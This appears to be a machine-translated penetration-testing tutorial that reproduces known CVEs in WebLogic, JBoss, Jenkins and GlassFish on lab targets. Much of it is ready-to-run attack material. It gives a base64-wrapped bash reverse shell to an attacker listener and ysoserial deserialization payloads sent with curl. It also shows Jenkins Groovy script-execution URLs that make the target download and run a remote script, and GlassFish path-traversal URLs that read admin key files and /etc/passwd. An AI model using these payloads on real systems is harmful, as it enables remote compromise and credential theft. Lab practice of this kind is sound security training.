Middleware security-CVE recurrence&Weblogic&Jenkins&GlassFish vulnerability recurrence

Directory

• Service Attack and Defense-Middleware Security &CVE Recurrence &Weblogic &Jenkins &GlassFish Vulnerability Recurrence
• • Middleware-Weblogic security issues
  • • Vulnerability recurrence
    • • CVE_2017_3506 vulnerability reappears
  • Middleware-JBoos security issues
  • • Vulnerability recurrence
    • • CVE-2017-12149 vulnerability reappears
      • CVE-2017-7504 vulnerability reappears
  • Middleware-Jenkins security issues
  • • Vulnerability recurrence
    • • CVE-2017-1000353 vulnerability reappears
      • CVE-2018-1000861 vulnerability reappears
  • Middleware-Glassfish Security Issues
  • • Vulnerability recurrence
    • • CVE-2017-1000028 vulnerability reappears

Service Attack and Defense-Middleware Security &CVE Recurrence &Weblogic &Jenkins &GlassFish Vulnerability Recurrence

List of middleware and frameworks: IIS, Apache, Nginx, Tomcat, Docker, Weblogic, JBoos, WebSphere, Jenkins, GlassFish, Jira, Struts2, Laravel, Solr, Shiro, Thinkphp, Spring, Flask, jQuery, etc.
1. Middleware-Weblogic security
2. Middleware-JBoos security
3. Middleware-Jenkins security
4. Middleware-GlassFish Security

Security testing of common middleware:
1. Improper configuration – parsing & weak passwords
2. Security mechanism-specific security vulnerabilities
3. Security mechanism-weak password blasting attack
4. Security application-framework specific security vulnerabilities

Middleware security testing process:
1. Determine middleware information – name & version & third party
2. Determine middleware problems-improper configuration & open vulnerabilities
3. Determine middleware utilization-weak password & EXP & framework vulnerabilities

Application service security testing process:
1. Determine service opening status – port scanning & combined applications, etc.
2. Determine the service type ownership-database & file transfer & communication, etc.
3. Determine service utilization methods – specific vulnerabilities & unauthorized & weak passwords, etc.

Middleware-Weblogic security issues

Detailed explanation: weblogic detailed explanation

introduce:
Java application server software
WebLogic is an application server produced by Oracle Corporation of the United States. To be precise, it is a middleware based on the JAVAEE architecture. WebLogic is a Java application server used to develop, integrate, deploy and manage large-scale distributed Web applications, network applications and database applications. Introduce the dynamic capabilities of Java and the security of Java Enterprise standards into the development, integration, deployment, and management of large-scale network applications.
Probe default port: 7001. Weblogic is a J2EE application server launched by Oracle.

Security Question:

CVE_2017_3506
CVE_2018_2893
CVE_2018_3245
CVE-2018-2628 Deserialization
CVE_2020_14882
CVE_2021_2394 Deserialization
CVE-2023-21839 Deserialization
…

The above vulnerabilities can basically be directly exploited using mature tools.

Vulnerability Recurrence

Take CVE_2017_3506 as an example (the exploitation of other numbered vulnerabilities is basically similar, just go to the tool and click ~):

CVE_2017_3506 vulnerability recurrence

Shooting range: vulfocus
Start the environment:

access:

Directly put the URL information into the tool for detection:
There is a vulnerability and the command can be executed directly:

Other vulnerability numbers are exploited in a similar way. They are directly put into the tool for detection. If they exist, they exist. You can directly execute commands or upload, inject, and other operations.

Manual operation recurrence: weblogic desequence vulnerability recurrence

Middleware-JBoos security issues

Detailed explanation: Jboss detailed explanation

introduce:
J2EE open source application server
It is an open source application server based on J2EE. JBoss code is licensed under the LGPL and can be used free of charge in any commercial application. JBoss is a container and server that manages EJB, supporting EJB 1.1, EJB 2.0 and EJB3 specifications. However, JBoss core services do not include WEB containers that support servlet/JSP, and are generally used in conjunction with Tomcat or Jetty.

The ports usually occupied by Jboss are 1098, 1099, 4444, 4445, 8080, 8009, 8083, and 8093. Red Hat JBoss Application Server is an open source application server based on JavaEE.

Security Question:

CVE-2017-12149
CVE-2017-7504
Weak password Unauthorized access
…

Vulnerability Recurrence

CVE-2017-12149 vulnerability reappears

The vulnerability is a Java deserialization error type and exists in the ReadOnlyAccessFilter filter in the HttpInvoker component of Jboss. The filter attempts to deserialize the data stream from the client without any security checks, leading to the vulnerability.

Shooting range: vulhub
Reference: JBoss 5.x/6.x Deserialization Vulnerability

Start the environment:

access:

Exploit:

payload：
//Rebound shell command:
sh -i > & amp; /dev/tcp/192.168.100.1/8888 0> & amp;1
//After base64 encryption:
bash -c {<!-- -->echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA + JjE=}|{<!-- -->base64,-d}|{<!-- -->bash,-i}
//ysoserial tool utilization:
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash -c{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA + JjE=}|{base64,-d}|{bash,-i}" > poc.ser
//curl command requests access and sends:
curl http://192.168.100.134:8080/invoker/readonly --data-binary @poc.ser
//The receiving end starts monitoring
nc -lvvp 8888

The poc.ser file is generated in the ysoserial tool directory:

Send curl request:

The listening terminal successfully received and the rebound shell was successful:

CVE-2017-7504 vulnerability reappears

introduce:
Red Hat JBoss Application Server is an open source application server based on JavaEE. In JBoss AS 4.x and previous versions, there is a deserialization vulnerability in the HTTPServerILServlet.java file of the JMS over HTTP Invocation Layer in the JbossMQ implementation process. A remote attacker can exploit this vulnerability to execute arbitrary code with the help of specially crafted serialized data.

Shooting range: vulhub
Reference: JBoss 4.x JBossMQ JMS Deserialization Vulnerability (CVE-2017-7504)

Start the environment:

access:

Exploit:

//This vulnerability is exploited in a similar way to CVE-2017-12149. The difference is that the content of the request address is different.
payload:
//Rebound shell command:
sh -i > & amp; /dev/tcp/192.168.100.1/8888 0> & amp;1
//After base64 encryption:
bash -c {<!-- -->echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA + JjE=}|{<!-- -->base64,-d}|{<!-- -->bash,-i}
//ysoserial tool utilization:
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash -c{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA + JjE=}|{base64,-d}|{bash,-i}" > poc.ser
//Make curl request:
curl http://192.168.100.134:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @poc.ser
//The receiving end starts monitoring:
nc -lvvp 8888

Send curl request:

The listening terminal successfully received and the rebound shell was successful:

Middleware-Jenkins security issues

Detailed explanation: Jenkins detailed explanation
introduce:

Open source software projects
Jenkins is an open source software project. It is a continuous integration tool developed based on Java. It is used to monitor continuous repetitive work. It aims to provide an open and easy-to-use software platform so that software projects can perform continuous integration.
Probe default port: 8080

Security Question:

CVE-2017-1000353

CVE-2018-1000861

…

Vulnerability Recurrence

CVE-2017-1000353 vulnerability recurrence

Shooting range: vulfocus
or vulhub
Reference: Jenkins-CI remote code execution vulnerability
vulhub environment:

vulfocus environment:

Open the shooting range:

access:

Exploit:
Tool address: CVE-2017-1000353
The JDK version needs to be jdk-8u291. Other versions may fail and cannot be reproduced successfully.
Download address: JDK8

payload：
//Execute the command and create the file
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /123.txt"
//Execute exp
python exploit.py http://192.168.100.134:8080/ jenkins_poc.ser

//Then go back to our target machine, open the terminal and enter the following command to check whether the verification is successful.
docker ps -a
docker exec -it 838723a23ad0 /bin/bash
ls/

Rebound shell command:

sh -i > & amp; /dev/tcp/192.168.100.1/8888 0> & amp;1
//After base64 encryption
bash -c {<!-- -->echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA + JjE=}|{<!-- -->base64,-d}|{<!-- -->bash,-i}

//Rebound shell operation:
//Replace the command that just executed to create the file with the rebound shell command (base64 encrypted)
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA + JjE=}|{base64,-d}|{bash,-i}"
//Execute exp
python exploit.py http://192.168.100.134:8080/ jenkins_poc.ser

//The receiving end starts monitoring
nc -lvvp 8888

Pay attention to the JDK version, otherwise it may not be possible to reproduce.

CVE-2018-1000861 vulnerability recurrence

Shooting range: vulhub
Reference: Jenkins remote command execution vulnerability

Start the environment:

access:

Exploit:
exp download address: CVE-2018-1000861EXP

//Can be used directly using exp script, used under python2
payload:
python2exp.py

python2 exp.py http://192.168.100.134:8080/ "touch /tmp/123.txt"
python2 exp.py http://192.168.100.134:8080/ "touch /tmp/test.txt"

//Enter the shooting range environment for verification:
docker ps
docker exec -it range id /bin/bash
ls /tmp/

Instructions for use:

How to use:

Verification is successful:
File created successfully

Manual testing is also possible:

Manual detection:
poc:
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true & amp;value=public class x {<!-- -->public x(){<!-- -->"touch /tmp/rumilc".execute()}}
payload:
Create a file:
//Send the following request:
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true & amp;value=public class x {<!-- -->public x(){<!-- -->"touch /tmp/rumilc".execute()}}

verify:
Created successfully

Rebound shell:

payload：
//Rebound shell command for base64 encryption
python2 exp.py http://192.168.100.134:8080 "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA + JjE=}|{base64,-d}|{bash,-i}"
//The receiving end starts monitoring
nc -lvvp 8888

Successful rebound shell:

ps: If you cannot rebound, you can create a text file on the server and write the rebound shell command into the text file. Then python starts the http service and observes the status.

//Enable http service:
python -m http.server 8080

//python2 executes the exp script and saves the remote file to the target host
python2 exp.py target host "curl -o /tmp/cmd.sh http://xxxx:8080/cmd.txt"

//python2 executes the exp script and causes the target host to run the script file to bounce the shell
python2 exp.py target host "bash /tmp/cmd.sh"

http server observable status:

Enter the shooting range to verify that this file exists:

Next, use the python2 script exp command to execute it.

You can also access it manually through a browser and execute the following steps:

payload：
//Get local demo here
//Save the file to the target host:
//http://ip:port/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true & amp;value=public class x {<!-- -->public x(){<!-- -->"curl -o /tmp/cmd.sh http://VPSip:8080/cmd.txt".execute()}}
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true & amp;value=public class x {<!-- -->public x(){<!-- -->"curl -o /tmp/cmd.sh http://127.0.0.1:8080/cmd.txt".execute()}}

//Execute shell script
//http://ip:port/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true & amp;value=public class x {<!-- -->public x(){<!-- -->"bash /tmp/cmd.sh".execute()}}
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true & amp;value=public class x {<!-- -->public x(){<!-- -->"bash /tmp/cmd.sh".execute()}}

When accessing, the browser becomes a blank interface:
execution succeed

Middleware-Glassfish security issues

introduce:
Detailed explanation of GlassFish

A commercial application server
GlassFish is a robust, commercially compatible application server of production-grade quality that is free for development, deployment, and redistribution. Developers can obtain the source code for free and can make changes to the code.

Security Question:

CVE-2017-1000028
…

Vulnerability Recurrence

CVE-2017-1000028 vulnerability recurrence

Vulnerability principle:

In the Java language, will be parsed as \\?, and finally escaped into the ASCCII character . (dot). Use /// to jump upward to achieve the effect of directory traversal and arbitrary file reading.

Shooting range: vulhub
Reference: GlassFish Arbitrary File Reading Vulnerability

Start the environment:

Enter the environment and visit:
After the environment is running, visit http://your-ip:8080 and http://your-ip:4848 to view the web page. Among them, the 8080 port is the website content, and the 4848 port is the GlassFish management center.

payload:
//Read password:
https://192.168.100.134:4848/theme/META-INF/..........domains/domain1/config/admin-keyfile

//Read files under Linux:
https://192.168.100.134:4848/theme/META-INF/////// ////etc/passwd

//Read files under window:
http://you-ip:4848/theme/META-INF/////// ////windows/win.ini

Password read successfully:

File read successfully: